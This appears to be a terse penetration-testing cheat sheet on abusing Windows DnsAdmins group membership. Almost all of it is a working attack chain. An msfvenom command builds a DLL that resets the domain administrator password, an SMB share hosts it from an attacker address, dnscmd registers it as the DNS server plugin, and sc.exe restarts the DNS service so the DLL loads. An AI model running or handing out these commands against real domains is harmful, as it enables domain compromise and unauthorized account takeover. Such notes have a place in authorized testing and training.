DnsAdmins
Information
Exploitation
Admin Password
# generating the payload
sudo msfvenom -p windows/x64/exec cmd='net user administrator Password123! /domain' -f dll > da.dll
# starting an SMB server
$ impacket-smbserver -smb2support share ./# setting the Windows Registry remote DLL path
dnscmd.exe [FQDN] /config /serverlevelplugindll \\10.10.14.3\share\da.dlldnscmd [FQDN] /restart# stop service
sc.exe stop dns
# start service
sc.exe start dnsResources
Last updated